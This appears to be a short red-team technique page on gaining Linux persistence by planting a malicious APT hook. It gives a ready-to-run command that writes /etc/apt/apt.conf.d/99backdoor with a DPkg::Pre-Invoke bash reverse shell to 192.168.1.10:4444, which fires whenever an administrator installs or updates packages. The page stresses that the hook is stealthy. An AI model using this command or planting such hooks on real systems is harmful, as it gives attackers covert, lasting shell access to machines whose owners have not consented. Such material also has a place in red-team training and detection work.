redttps

Persistence with apt (Linux)

Description

This technique abuses the APT package manager by injecting a malicious hook into its configuration. A file is placed in /etc/apt/apt.conf.d/ that defines a command to be executed every time a package is installed or updated. By embedding a reverse shell or payload in this hook, the attacker ensures that any system administrator activity involving APT will trigger remote access. It’s stealthy because it blends into routine system maintenance.

    Steps

  1. Create a malicious configuration file (for example, a reverse shell, but it could be any binary)
    2. echo 'DPkg::Pre-Invoke { "bash -c '\''bash -i >&
 /dev/tcp/192.168.1.10/4444 0>&1'\''"; };' | sudo tee
 /etc/apt/apt.conf.d/99backdoor

    Reference: Created by Luis Rivera